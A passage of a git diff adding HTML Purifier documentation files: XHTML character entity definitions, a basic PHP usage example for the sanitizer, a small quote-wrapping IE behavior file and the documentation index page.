letter A grave, + U+00C0 ISOlat1 --> +<!ENTITY Aacute "Á"> <!-- latin capital letter A with acute, + U+00C1 ISOlat1 --> +<!ENTITY Acirc "Â"> <!-- latin capital letter A with circumflex, + U+00C2 ISOlat1 --> +<!ENTITY Atilde "Ã"> <!-- latin capital letter A with tilde, + U+00C3 ISOlat1 --> +<!ENTITY Auml "Ä"> <!-- latin capital letter A with diaeresis, + U+00C4 ISOlat1 --> +<!ENTITY Aring "Å"> <!-- latin capital letter A with ring above + = latin capital letter A ring, + U+00C5 ISOlat1 --> +<!ENTITY AElig "Æ"> <!-- latin capital letter AE + = latin capital ligature AE, + U+00C6 ISOlat1 --> +<!ENTITY Ccedil "Ç"> <!-- latin capital letter C with cedilla, + U+00C7 ISOlat1 --> +<!ENTITY Egrave "È"> <!-- latin capital letter E with grave, + U+00C8 ISOlat1 --> +<!ENTITY Eacute "É"> <!-- latin capital letter E with acute, + U+00C9 ISOlat1 --> +<!ENTITY Ecirc "Ê"> <!-- latin capital letter E with circumflex, + U+00CA ISOlat1 --> +<!ENTITY Euml "Ë"> <!-- latin capital letter E with diaeresis, + U+00CB ISOlat1 --> +<!ENTITY Igrave "Ì"> <!-- latin capital letter I with grave, + U+00CC ISOlat1 --> +<!ENTITY Iacute "Í"> <!-- latin capital letter I with acute, + U+00CD ISOlat1 --> +<!ENTITY Icirc "Î"> <!-- latin capital letter I with circumflex, + U+00CE ISOlat1 --> +<!ENTITY Iuml "Ï"> <!-- latin capital letter I with diaeresis, + U+00CF ISOlat1 --> +<!ENTITY ETH "Ð"> <!-- latin capital letter ETH, U+00D0 ISOlat1 --> +<!ENTITY Ntilde "Ñ"> <!-- latin capital letter N with tilde, + U+00D1 ISOlat1 --> +<!ENTITY Ograve "Ò"> <!-- latin capital letter O with grave, + U+00D2 ISOlat1 --> +<!ENTITY Oacute "Ó"> <!-- latin capital letter O with acute, + U+00D3 ISOlat1 --> +<!ENTITY Ocirc "Ô"> <!-- latin capital letter O with circumflex, + U+00D4 ISOlat1 --> +<!ENTITY Otilde "Õ"> <!-- latin capital letter O with tilde, + U+00D5 ISOlat1 --> +<!ENTITY Ouml "Ö"> <!-- latin capital letter O with diaeresis, + U+00D6 ISOlat1 --> +<!ENTITY times "×"> <!-- multiplication sign, U+00D7 ISOnum --> +<!ENTITY Oslash "Ø"> <!-- latin capital letter O with stroke + = latin capital letter O slash, + U+00D8 ISOlat1 --> +<!ENTITY Ugrave "Ù"> <!-- latin capital letter U with grave, + U+00D9 ISOlat1 --> +<!ENTITY Uacute "Ú"> <!-- latin capital letter U with acute, + U+00DA ISOlat1 --> +<!ENTITY Ucirc "Û"> <!-- latin capital letter U with circumflex, + U+00DB ISOlat1 --> +<!ENTITY Uuml "Ü"> <!-- latin capital letter U with diaeresis, + U+00DC ISOlat1 --> +<!ENTITY Yacute "Ý"> <!-- latin capital letter Y with acute, + U+00DD ISOlat1 --> +<!ENTITY THORN "Þ"> <!-- latin capital letter THORN, + U+00DE ISOlat1 --> +<!ENTITY szlig "ß"> <!-- latin small letter sharp s = ess-zed, + U+00DF ISOlat1 --> +<!ENTITY agrave "à"> <!-- latin small letter a with grave + = latin small letter a grave, + U+00E0 ISOlat1 --> +<!ENTITY aacute "á"> <!-- latin small letter a with acute, + U+00E1 ISOlat1 --> +<!ENTITY acirc "â"> <!-- latin small letter a with circumflex, + U+00E2 ISOlat1 --> +<!ENTITY atilde "ã"> <!-- latin small letter a with tilde, + U+00E3 ISOlat1 --> +<!ENTITY auml "ä"> <!-- latin small letter a with diaeresis, + U+00E4 ISOlat1 --> +<!ENTITY aring "å"> <!-- latin small letter a with ring above + = latin small letter a ring, + U+00E5 ISOlat1 --> +<!ENTITY aelig "æ"> <!-- latin small letter ae + = latin small ligature ae, U+00E6 ISOlat1 --> +<!ENTITY ccedil "ç"> <!-- latin small letter c with cedilla, + U+00E7 ISOlat1 --> +<!ENTITY egrave "è"> <!-- latin small letter e with grave, + U+00E8 ISOlat1 --> +<!ENTITY eacute "é"> <!-- latin small letter e with acute, + U+00E9 ISOlat1 --> +<!ENTITY ecirc "ê"> <!-- latin small letter e with circumflex, + U+00EA ISOlat1 --> +<!ENTITY euml "ë"> <!-- latin small letter e with diaeresis, + U+00EB ISOlat1 --> +<!ENTITY igrave "ì"> <!-- latin small letter i with grave, + U+00EC ISOlat1 --> +<!ENTITY iacute "í"> <!-- latin small letter i with acute, + U+00ED ISOlat1 --> +<!ENTITY icirc "î"> <!-- latin small letter i with circumflex, + U+00EE ISOlat1 --> +<!ENTITY iuml "ï"> <!-- latin small letter i with diaeresis, + U+00EF ISOlat1 --> +<!ENTITY eth "ð"> <!-- latin small letter eth, U+00F0 ISOlat1 --> +<!ENTITY ntilde "ñ"> <!-- latin small letter n with tilde, + U+00F1 ISOlat1 --> +<!ENTITY ograve "ò"> <!-- latin small letter o with grave, + U+00F2 ISOlat1 --> +<!ENTITY oacute "ó"> <!-- latin small letter o with acute, + U+00F3 ISOlat1 --> +<!ENTITY ocirc "ô"> <!-- latin small letter o with circumflex, + U+00F4 ISOlat1 --> +<!ENTITY otilde "õ"> <!-- latin small letter o with tilde, + U+00F5 ISOlat1 --> +<!ENTITY ouml "ö"> <!-- latin small letter o with diaeresis, + U+00F6 ISOlat1 --> +<!ENTITY divide "÷"> <!-- division sign, U+00F7 ISOnum --> +<!ENTITY oslash "ø"> <!-- latin small letter o with stroke, + = latin small letter o slash, + U+00F8 ISOlat1 --> +<!ENTITY ugrave "ù"> <!-- latin small letter u with grave, + U+00F9 ISOlat1 --> +<!ENTITY uacute "ú"> <!-- latin small letter u with acute, + U+00FA ISOlat1 --> +<!ENTITY ucirc "û"> <!-- latin small letter u with circumflex, + U+00FB ISOlat1 --> +<!ENTITY uuml "ü"> <!-- latin small letter u with diaeresis, + U+00FC ISOlat1 --> +<!ENTITY yacute "ý"> <!-- latin small letter y with acute, + U+00FD ISOlat1 --> +<!ENTITY thorn "þ"> <!-- latin small letter thorn, + U+00FE ISOlat1 --> +<!ENTITY yuml "ÿ"> <!-- latin small letter y with diaeresis, + U+00FF ISOlat1 --> diff --git a/lib/htmlpurifier/docs/entities/xhtml-special.ent b/lib/htmlpurifier/docs/entities/xhtml-special.ent new file mode 100644 index 000000000..ca358b2fe --- /dev/null +++ b/lib/htmlpurifier/docs/entities/xhtml-special.ent @@ -0,0 +1,80 @@ +<!-- Special characters for XHTML --> + +<!-- Character entity set. Typical invocation: + <!ENTITY % HTMLspecial PUBLIC + "-//W3C//ENTITIES Special for XHTML//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml-special.ent"> + %HTMLspecial; +--> + +<!-- Portions (C) International Organization for Standardization 1986: + Permission to copy in any form is granted for use with + conforming SGML systems and applications as defined in + ISO 8879, provided this notice is included in all copies. +--> + +<!-- Relevant ISO entity set is given unless names are newly introduced. + New names (i.e., not in ISO 8879 list) do not clash with any + existing ISO 8879 entity names. ISO 10646 character numbers + are given for each character, in hex. values are decimal + conversions of the ISO 10646 values and refer to the document + character set. Names are Unicode names. +--> + +<!-- C0 Controls and Basic Latin --> +<!ENTITY quot """> <!-- quotation mark, U+0022 ISOnum --> +<!ENTITY amp "&#38;"> <!-- ampersand, U+0026 ISOnum --> +<!ENTITY lt "&#60;"> <!-- less-than sign, U+003C ISOnum --> +<!ENTITY gt ">"> <!-- greater-than sign, U+003E ISOnum --> +<!ENTITY apos "'"> <!-- apostrophe = APL quote, U+0027 ISOnum --> + +<!-- Latin Extended-A --> +<!ENTITY OElig "Œ"> <!-- latin capital ligature OE, + U+0152 ISOlat2 --> +<!ENTITY oelig "œ"> <!-- latin small ligature oe, U+0153 ISOlat2 --> +<!-- ligature is a misnomer, this is a separate character in some languages --> +<!ENTITY Scaron "Š"> <!-- latin capital letter S with caron, + U+0160 ISOlat2 --> +<!ENTITY scaron "š"> <!-- latin small letter s with caron, + U+0161 ISOlat2 --> +<!ENTITY Yuml "Ÿ"> <!-- latin capital letter Y with diaeresis, + U+0178 ISOlat2 --> + +<!-- Spacing Modifier Letters --> +<!ENTITY circ "ˆ"> <!-- modifier letter circumflex accent, + U+02C6 ISOpub --> +<!ENTITY tilde "˜"> <!-- small tilde, U+02DC ISOdia --> + +<!-- General Punctuation --> +<!ENTITY ensp " "> <!-- en space, U+2002 ISOpub --> +<!ENTITY emsp " "> <!-- em space, U+2003 ISOpub --> +<!ENTITY thinsp " "> <!-- thin space, U+2009 ISOpub --> +<!ENTITY zwnj "‌"> <!-- zero width non-joiner, + U+200C NEW RFC 2070 --> +<!ENTITY zwj "‍"> <!-- zero width joiner, U+200D NEW RFC 2070 --> +<!ENTITY lrm "‎"> <!-- left-to-right mark, U+200E NEW RFC 2070 --> +<!ENTITY rlm "‏"> <!-- right-to-left mark, U+200F NEW RFC 2070 --> +<!ENTITY ndash "–"> <!-- en dash, U+2013 ISOpub --> +<!ENTITY mdash "—"> <!-- em dash, U+2014 ISOpub --> +<!ENTITY lsquo "‘"> <!-- left single quotation mark, + U+2018 ISOnum --> +<!ENTITY rsquo "’"> <!-- right single quotation mark, + U+2019 ISOnum --> +<!ENTITY sbquo "‚"> <!-- single low-9 quotation mark, U+201A NEW --> +<!ENTITY ldquo "“"> <!-- left double quotation mark, + U+201C ISOnum --> +<!ENTITY rdquo "”"> <!-- right double quotation mark, + U+201D ISOnum --> +<!ENTITY bdquo "„"> <!-- double low-9 quotation mark, U+201E NEW --> +<!ENTITY dagger "†"> <!-- dagger, U+2020 ISOpub --> +<!ENTITY Dagger "‡"> <!-- double dagger, U+2021 ISOpub --> +<!ENTITY permil "‰"> <!-- per mille sign, U+2030 ISOtech --> +<!ENTITY lsaquo "‹"> <!-- single left-pointing angle quotation mark, + U+2039 ISO proposed --> +<!-- lsaquo is proposed but not yet ISO standardized --> +<!ENTITY rsaquo "›"> <!-- single right-pointing angle quotation mark, + U+203A ISO proposed --> +<!-- rsaquo is proposed but not yet ISO standardized --> + +<!-- Currency Symbols --> +<!ENTITY euro "€"> <!-- euro sign, U+20AC NEW --> diff --git a/lib/htmlpurifier/docs/entities/xhtml-symbol.ent b/lib/htmlpurifier/docs/entities/xhtml-symbol.ent new file mode 100644 index 000000000..63c2abfa6 --- /dev/null +++ b/lib/htmlpurifier/docs/entities/xhtml-symbol.ent @@ -0,0 +1,237 @@ +<!-- Mathematical, Greek and Symbolic characters for XHTML --> + +<!-- Character entity set. Typical invocation: + <!ENTITY % HTMLsymbol PUBLIC + "-//W3C//ENTITIES Symbols for XHTML//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml-symbol.ent"> + %HTMLsymbol; +--> + +<!-- Portions (C) International Organization for Standardization 1986: + Permission to copy in any form is granted for use with + conforming SGML systems and applications as defined in + ISO 8879, provided this notice is included in all copies. +--> + +<!-- Relevant ISO entity set is given unless names are newly introduced. + New names (i.e., not in ISO 8879 list) do not clash with any + existing ISO 8879 entity names. ISO 10646 character numbers + are given for each character, in hex. values are decimal + conversions of the ISO 10646 values and refer to the document + character set. Names are Unicode names. +--> + +<!-- Latin Extended-B --> +<!ENTITY fnof "ƒ"> <!-- latin small letter f with hook = function + = florin, U+0192 ISOtech --> + +<!-- Greek --> +<!ENTITY Alpha "Α"> <!-- greek capital letter alpha, U+0391 --> +<!ENTITY Beta "Β"> <!-- greek capital letter beta, U+0392 --> +<!ENTITY Gamma "Γ"> <!-- greek capital letter gamma, + U+0393 ISOgrk3 --> +<!ENTITY Delta "Δ"> <!-- greek capital letter delta, + U+0394 ISOgrk3 --> +<!ENTITY Epsilon "Ε"> <!-- greek capital letter epsilon, U+0395 --> +<!ENTITY Zeta "Ζ"> <!-- greek capital letter zeta, U+0396 --> +<!ENTITY Eta "Η"> <!-- greek capital letter eta, U+0397 --> +<!ENTITY Theta "Θ"> <!-- greek capital letter theta, + U+0398 ISOgrk3 --> +<!ENTITY Iota "Ι"> <!-- greek capital letter iota, U+0399 --> +<!ENTITY Kappa "Κ"> <!-- greek capital letter kappa, U+039A --> +<!ENTITY Lambda "Λ"> <!-- greek capital letter lamda, + U+039B ISOgrk3 --> +<!ENTITY Mu "Μ"> <!-- greek capital letter mu, U+039C --> +<!ENTITY Nu "Ν"> <!-- greek capital letter nu, U+039D --> +<!ENTITY Xi "Ξ"> <!-- greek capital letter xi, U+039E ISOgrk3 --> +<!ENTITY Omicron "Ο"> <!-- greek capital letter omicron, U+039F --> +<!ENTITY Pi "Π"> <!-- greek capital letter pi, U+03A0 ISOgrk3 --> +<!ENTITY Rho "Ρ"> <!-- greek capital letter rho, U+03A1 --> +<!-- there is no Sigmaf, and no U+03A2 character either --> +<!ENTITY Sigma "Σ"> <!-- greek capital letter sigma, + U+03A3 ISOgrk3 --> +<!ENTITY Tau "Τ"> <!-- greek capital letter tau, U+03A4 --> +<!ENTITY Upsilon "Υ"> <!-- greek capital letter upsilon, + U+03A5 ISOgrk3 --> +<!ENTITY Phi "Φ"> <!-- greek capital letter phi, + U+03A6 ISOgrk3 --> +<!ENTITY Chi "Χ"> <!-- greek capital letter chi, U+03A7 --> +<!ENTITY Psi "Ψ"> <!-- greek capital letter psi, + U+03A8 ISOgrk3 --> +<!ENTITY Omega "Ω"> <!-- greek capital letter omega, + U+03A9 ISOgrk3 --> + +<!ENTITY alpha "α"> <!-- greek small letter alpha, + U+03B1 ISOgrk3 --> +<!ENTITY beta "β"> <!-- greek small letter beta, U+03B2 ISOgrk3 --> +<!ENTITY gamma "γ"> <!-- greek small letter gamma, + U+03B3 ISOgrk3 --> +<!ENTITY delta "δ"> <!-- greek small letter delta, + U+03B4 ISOgrk3 --> +<!ENTITY epsilon "ε"> <!-- greek small letter epsilon, + U+03B5 ISOgrk3 --> +<!ENTITY zeta "ζ"> <!-- greek small letter zeta, U+03B6 ISOgrk3 --> +<!ENTITY eta "η"> <!-- greek small letter eta, U+03B7 ISOgrk3 --> +<!ENTITY theta "θ"> <!-- greek small letter theta, + U+03B8 ISOgrk3 --> +<!ENTITY iota "ι"> <!-- greek small letter iota, U+03B9 ISOgrk3 --> +<!ENTITY kappa "κ"> <!-- greek small letter kappa, + U+03BA ISOgrk3 --> +<!ENTITY lambda "λ"> <!-- greek small letter lamda, + U+03BB ISOgrk3 --> +<!ENTITY mu "μ"> <!-- greek small letter mu, U+03BC ISOgrk3 --> +<!ENTITY nu "ν"> <!-- greek small letter nu, U+03BD ISOgrk3 --> +<!ENTITY xi "ξ"> <!-- greek small letter xi, U+03BE ISOgrk3 --> +<!ENTITY omicron "ο"> <!-- greek small letter omicron, U+03BF NEW --> +<!ENTITY pi "π"> <!-- greek small letter pi, U+03C0 ISOgrk3 --> +<!ENTITY rho "ρ"> <!-- greek small letter rho, U+03C1 ISOgrk3 --> +<!ENTITY sigmaf "ς"> <!-- greek small letter final sigma, + U+03C2 ISOgrk3 --> +<!ENTITY sigma "σ"> <!-- greek small letter sigma, + U+03C3 ISOgrk3 --> +<!ENTITY tau "τ"> <!-- greek small letter tau, U+03C4 ISOgrk3 --> +<!ENTITY upsilon "υ"> <!-- greek small letter upsilon, + U+03C5 ISOgrk3 --> +<!ENTITY phi "φ"> <!-- greek small letter phi, U+03C6 ISOgrk3 --> +<!ENTITY chi "χ"> <!-- greek small letter chi, U+03C7 ISOgrk3 --> +<!ENTITY psi "ψ"> <!-- greek small letter psi, U+03C8 ISOgrk3 --> +<!ENTITY omega "ω"> <!-- greek small letter omega, + U+03C9 ISOgrk3 --> +<!ENTITY thetasym "ϑ"> <!-- greek theta symbol, + U+03D1 NEW --> +<!ENTITY upsih "ϒ"> <!-- greek upsilon with hook symbol, + U+03D2 NEW --> +<!ENTITY piv "ϖ"> <!-- greek pi symbol, U+03D6 ISOgrk3 --> + +<!-- General Punctuation --> +<!ENTITY bull "•"> <!-- bullet = black small circle, + U+2022 ISOpub --> +<!-- bullet is NOT the same as bullet operator, U+2219 --> +<!ENTITY hellip "…"> <!-- horizontal ellipsis = three dot leader, + U+2026 ISOpub --> +<!ENTITY prime "′"> <!-- prime = minutes = feet, U+2032 ISOtech --> +<!ENTITY Prime "″"> <!-- double prime = seconds = inches, + U+2033 ISOtech --> +<!ENTITY oline "‾"> <!-- overline = spacing overscore, + U+203E NEW --> +<!ENTITY frasl "⁄"> <!-- fraction slash, U+2044 NEW --> + +<!-- Letterlike Symbols --> +<!ENTITY weierp "℘"> <!-- script capital P = power set + = Weierstrass p, U+2118 ISOamso --> +<!ENTITY image "ℑ"> <!-- black-letter capital I = imaginary part, + U+2111 ISOamso --> +<!ENTITY real "ℜ"> <!-- black-letter capital R = real part symbol, + U+211C ISOamso --> +<!ENTITY trade "™"> <!-- trade mark sign, U+2122 ISOnum --> +<!ENTITY alefsym "ℵ"> <!-- alef symbol = first transfinite cardinal, + U+2135 NEW --> +<!-- alef symbol is NOT the same as hebrew letter alef, + U+05D0 although the same glyph could be used to depict both characters --> + +<!-- Arrows --> +<!ENTITY larr "←"> <!-- leftwards arrow, U+2190 ISOnum --> +<!ENTITY uarr "↑"> <!-- upwards arrow, U+2191 ISOnum--> +<!ENTITY rarr "→"> <!-- rightwards arrow, U+2192 ISOnum --> +<!ENTITY darr "↓"> <!-- downwards arrow, U+2193 ISOnum --> +<!ENTITY harr "↔"> <!-- left right arrow, U+2194 ISOamsa --> +<!ENTITY crarr "↵"> <!-- downwards arrow with corner leftwards + = carriage return, U+21B5 NEW --> +<!ENTITY lArr "⇐"> <!-- leftwards double arrow, U+21D0 ISOtech --> +<!-- Unicode does not say that lArr is the same as the 'is implied by' arrow + but also does not have any other character for that function. So lArr can + be used for 'is implied by' as ISOtech suggests --> +<!ENTITY uArr "⇑"> <!-- upwards double arrow, U+21D1 ISOamsa --> +<!ENTITY rArr "⇒"> <!-- rightwards double arrow, + U+21D2 ISOtech --> +<!-- Unicode does not say this is the 'implies' character but does not have + another character with this function so rArr can be used for 'implies' + as ISOtech suggests --> +<!ENTITY dArr "⇓"> <!-- downwards double arrow, U+21D3 ISOamsa --> +<!ENTITY hArr "⇔"> <!-- left right double arrow, + U+21D4 ISOamsa --> + +<!-- Mathematical Operators --> +<!ENTITY forall "∀"> <!-- for all, U+2200 ISOtech --> +<!ENTITY part "∂"> <!-- partial differential, U+2202 ISOtech --> +<!ENTITY exist "∃"> <!-- there exists, U+2203 ISOtech --> +<!ENTITY empty "∅"> <!-- empty set = null set, U+2205 ISOamso --> +<!ENTITY nabla "∇"> <!-- nabla = backward difference, + U+2207 ISOtech --> +<!ENTITY isin "∈"> <!-- element of, U+2208 ISOtech --> +<!ENTITY notin "∉"> <!-- not an element of, U+2209 ISOtech --> +<!ENTITY ni "∋"> <!-- contains as member, U+220B ISOtech --> +<!ENTITY prod "∏"> <!-- n-ary product = product sign, + U+220F ISOamsb --> +<!-- prod is NOT the same character as U+03A0 'greek capital letter pi' though + the same glyph might be used for both --> +<!ENTITY sum "∑"> <!-- n-ary summation, U+2211 ISOamsb --> +<!-- sum is NOT the same character as U+03A3 'greek capital letter sigma' + though the same glyph might be used for both --> +<!ENTITY minus "−"> <!-- minus sign, U+2212 ISOtech --> +<!ENTITY lowast "∗"> <!-- asterisk operator, U+2217 ISOtech --> +<!ENTITY radic "√"> <!-- square root = radical sign, + U+221A ISOtech --> +<!ENTITY prop "∝"> <!-- proportional to, U+221D ISOtech --> +<!ENTITY infin "∞"> <!-- infinity, U+221E ISOtech --> +<!ENTITY ang "∠"> <!-- angle, U+2220 ISOamso --> +<!ENTITY and "∧"> <!-- logical and = wedge, U+2227 ISOtech --> +<!ENTITY or "∨"> <!-- logical or = vee, U+2228 ISOtech --> +<!ENTITY cap "∩"> <!-- intersection = cap, U+2229 ISOtech --> +<!ENTITY cup "∪"> <!-- union = cup, U+222A ISOtech --> +<!ENTITY int "∫"> <!-- integral, U+222B ISOtech --> +<!ENTITY there4 "∴"> <!-- therefore, U+2234 ISOtech --> +<!ENTITY sim "∼"> <!-- tilde operator = varies with = similar to, + U+223C ISOtech --> +<!-- tilde operator is NOT the same character as the tilde, U+007E, + although the same glyph might be used to represent both --> +<!ENTITY cong "≅"> <!-- approximately equal to, U+2245 ISOtech --> +<!ENTITY asymp "≈"> <!-- almost equal to = asymptotic to, + U+2248 ISOamsr --> +<!ENTITY ne "≠"> <!-- not equal to, U+2260 ISOtech --> +<!ENTITY equiv "≡"> <!-- identical to, U+2261 ISOtech --> +<!ENTITY le "≤"> <!-- less-than or equal to, U+2264 ISOtech --> +<!ENTITY ge "≥"> <!-- greater-than or equal to, + U+2265 ISOtech --> +<!ENTITY sub "⊂"> <!-- subset of, U+2282 ISOtech --> +<!ENTITY sup "⊃"> <!-- superset of, U+2283 ISOtech --> +<!ENTITY nsub "⊄"> <!-- not a subset of, U+2284 ISOamsn --> +<!ENTITY sube "⊆"> <!-- subset of or equal to, U+2286 ISOtech --> +<!ENTITY supe "⊇"> <!-- superset of or equal to, + U+2287 ISOtech --> +<!ENTITY oplus "⊕"> <!-- circled plus = direct sum, + U+2295 ISOamsb --> +<!ENTITY otimes "⊗"> <!-- circled times = vector product, + U+2297 ISOamsb --> +<!ENTITY perp "⊥"> <!-- up tack = orthogonal to = perpendicular, + U+22A5 ISOtech --> +<!ENTITY sdot "⋅"> <!-- dot operator, U+22C5 ISOamsb --> +<!-- dot operator is NOT the same character as U+00B7 middle dot --> + +<!-- Miscellaneous Technical --> +<!ENTITY lceil "⌈"> <!-- left ceiling = APL upstile, + U+2308 ISOamsc --> +<!ENTITY rceil "⌉"> <!-- right ceiling, U+2309 ISOamsc --> +<!ENTITY lfloor "⌊"> <!-- left floor = APL downstile, + U+230A ISOamsc --> +<!ENTITY rfloor "⌋"> <!-- right floor, U+230B ISOamsc --> +<!ENTITY lang "〈"> <!-- left-pointing angle bracket = bra, + U+2329 ISOtech --> +<!-- lang is NOT the same character as U+003C 'less than sign' + or U+2039 'single left-pointing angle quotation mark' --> +<!ENTITY rang "〉"> <!-- right-pointing angle bracket = ket, + U+232A ISOtech --> +<!-- rang is NOT the same character as U+003E 'greater than sign' + or U+203A 'single right-pointing angle quotation mark' --> + +<!-- Geometric Shapes --> +<!ENTITY loz "◊"> <!-- lozenge, U+25CA ISOpub --> + +<!-- Miscellaneous Symbols --> +<!ENTITY spades "♠"> <!-- black spade suit, U+2660 ISOpub --> +<!-- black here seems to mean filled as opposed to hollow --> +<!ENTITY clubs "♣"> <!-- black club suit = shamrock, + U+2663 ISOpub --> +<!ENTITY hearts "♥"> <!-- black heart suit = valentine, + U+2665 ISOpub --> +<!ENTITY diams "♦"> <!-- black diamond suit, U+2666 ISOpub --> diff --git a/lib/htmlpurifier/docs/examples/basic.php b/lib/htmlpurifier/docs/examples/basic.php new file mode 100644 index 000000000..b51096d2d --- /dev/null +++ b/lib/htmlpurifier/docs/examples/basic.php @@ -0,0 +1,23 @@ +<?php + +// This file demonstrates basic usage of HTMLPurifier. + +// replace this with the path to the HTML Purifier library +require_once '../../library/HTMLPurifier.auto.php'; + +$config = HTMLPurifier_Config::createDefault(); + +// configuration goes here: +$config->set('Core.Encoding', 'UTF-8'); // replace with your encoding +$config->set('HTML.Doctype', 'XHTML 1.0 Transitional'); // replace with your doctype + +$purifier = new HTMLPurifier($config); + +// untrusted input HTML +$html = '<b>Simple and short'; + +$pure_html = $purifier->purify($html); + +echo '<pre>' . htmlspecialchars($pure_html) . '</pre>'; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/fixquotes.htc b/lib/htmlpurifier/docs/fixquotes.htc new file mode 100644 index 000000000..80dda2dc2 --- /dev/null +++ b/lib/htmlpurifier/docs/fixquotes.htc @@ -0,0 +1,9 @@ +<public:attach event="oncontentready" onevent="init();" /> +<script> +function init() { + element.innerHTML = '“'+element.innerHTML+'”'; +} +</script> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/index.html b/lib/htmlpurifier/docs/index.html new file mode 100644 index 000000000..3c4ecc716 --- /dev/null +++ b/lib/htmlpurifier/docs/index.html @@ -0,0 +1,188 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Index to all HTML Purifier documentation." /> +<link rel="stylesheet" type="text/css" href="./style.css" /> + +<title>Documentation - HTML Purifier</title> + +</head> +<body> + +<h1>Documentation</h1> + +<p><strong><a href="http://htmlpurifier.org/">HTML Purifier</a></strong> has documentation for all types of people. +Here is an index of all of them.</p> + +<h2>End-user</h2> +<p>End-user documentation that contains articles, tutorials and useful +information for casual developers using HTML Purifier.</p> + +<dl> + +<dt><a href="enduser-id.html">IDs</a></dt> +<dd>Explains various methods for allowing IDs in documents safely.</dd> + +<dt><a href="enduser-youtube.html">Embedding YouTube videos</a></dt> +<dd>Explains how to safely allow the embedding of flash from trusted sites.</dd> + +<dt><a href="enduser-slow.html">Speeding up HTML Purifier</a></dt> +<dd>Explains how to speed up HTML Purifier through caching or inbound filtering.</dd> + +<dt><a href="enduser-utf8.html">UTF-8: The Secret of Character Encoding</a></dt> +<dd>Describes the rationale for using UTF-8, the ramifications otherwise, and how to make the switch.</dd> + +<dt><a href="enduser-tidy.html">Tidy</a></dt> +<dd>Tutorial for tweaking HTML Purifier's Tidy-like behavior.</dd> + +<dt><a href="enduser-customize.html">Customize</a></dt> +<dd>Tutorial for customizing HTML Purifier's tag and attribute sets.</dd> + +<dt><a href="enduser-uri-filter.html">URI Filters</a></dt> +<dd>Tutorial for creating custom URI filters.</dd> + +</dl> + +<h2>Development</h2> +<p>Developer documentation detailing code issues, roadmaps and project +conventions.</p> + +<dl> + +<dt><a href="dev-progress.html">Implementation Progress</a></dt> +<dd>Tables detailing HTML element and CSS property implementation coverage.</dd> + +<dt><a href="dev-naming.html">Naming Conventions</a></dt> +<dd>Defines class naming conventions.</dd> + +<dt><a href="dev-optimization.html">Optimization</a></dt> +<dd>Discusses possible methods of optimizing HTML Purifier.</dd> + +<dt><a href="dev-flush.html">Flushing the Purifier</a></dt> +<dd>Discusses when to flush HTML Purifier's various caches.</dd> + +<dt><a href="dev-advanced-api.html">Advanced API</a></dt> +<dd>Specification for HTML Purifier's advanced API for defining +custom filtering behavior.</dd> + +<dt><a href="dev-config-schema.html">Config Schema</a></dt> +<dd>Describes config schema framework in HTML Purifier.</dd> + +</dl> + +<h2>Proposals</h2> +<p>Proposed features, as well as the associated rambling to get a clear +objective in place before attempted implementation.</p> + +<dl> +<dt><a href="proposal-colors.html">Colors</a></dt> +<dd>Proposal to allow for color constraints.</dd> +</dl> + +<h2>Reference</h2> +<p>Miscellaneous essays, research pieces and other reference type material +that may not directly discuss HTML Purifier.</p> + +<dl> +<dt><a href="ref-devnetwork.html">DevNetwork Credits</a></dt> +<dd>Credits and links to DevNetwork forum topics.</dd> +</dl> + +<h2>Internal memos</h2> + +<p>Plaintext documents that are more for use by active developers of +the code. They may be upgraded to HTML files or stay as TXT scratchpads.</p> + +<table class="table"> + +<thead><tr> + <th style="width:10%">Type</th> + <th style="width:20%">Name</th> + <th>Description</th> +</tr></thead> + +<tbody> + +<tr> + <td>End-user</td> + <td><a href="enduser-overview.txt">Overview</a></td> + <td>High level overview of the general control flow (mostly obsolete).</td> +</tr> + +<tr> + <td>End-user</td> + <td><a href="enduser-security.txt">Security</a></td> + <td>Common security issues that may still arise (half-baked).</td> +</tr> + +<tr> + <td>Development</td> + <td><a href="dev-config-bcbreaks.txt">Config BC Breaks</a></td> + <td>Backwards-incompatible changes in HTML Purifier 4.0.0</td> +</tr> + +<tr> + <td>Development</td> + <td><a href="dev-code-quality.txt">Code Quality Issues</a></td> + <td>Enumerates code quality issues and places that need to be refactored.</td> +</tr> + +<tr> + <td>Proposal</td> + <td><a href="proposal-filter-levels.txt">Filter levels</a></td> + <td>Outlines details of projected configurable level of filtering.</td> +</tr> + +<tr> + <td>Proposal</td> + <td><a href="proposal-language.txt">Language</a></td> + <td>Specification of I18N for error messages derived from MediaWiki (half-baked).</td> +</tr> + +<tr> + <td>Proposal</td> + <td><a href="proposal-new-directives.txt">New directives</a></td> + <td>Assorted configuration options that could be implemented.</td> +</tr> + +<tr> + <td>Proposal</td> + <td><a href="proposal-css-extraction.txt">CSS extraction</a></td> + <td>Taking the inline CSS out of documents and into <code>style</code>.</td> +</tr> + +<tr> + <td>Reference</td> + <td><a href="ref-content-models.txt">Handling Content Model Changes</a></td> + <td>Discusses how to tidy up content model changes using custom ChildDef classes.</td> +</tr> + +<tr> + <td>Reference</td> + <td><a href="ref-proprietary-tags.txt">Proprietary tags</a></td> + <td>List of vendor-specific tags we may want to transform to W3C compliant markup.</td> +</tr> + +<tr> + <td>Reference</td> + <td><a href="ref-html-modularization.txt">Modularization of HTMLDefinition</a></td> + <td>Provides a high-level overview of the concepts behind HTMLModules.</td> +</tr> + +<tr> + <td>Reference</td> + <td><a href="ref-whatwg.txt">WHATWG</a></td> + <td>How WHATWG plays into what we need to do.</td> +</tr> + +</tbody> + +</table> + +</body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/proposal-colors.html b/lib/htmlpurifier/docs/proposal-colors.html new file mode 100644 index 000000000..657633882 --- /dev/null +++ b/lib/htmlpurifier/docs/proposal-colors.html @@ -0,0 +1,49 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" 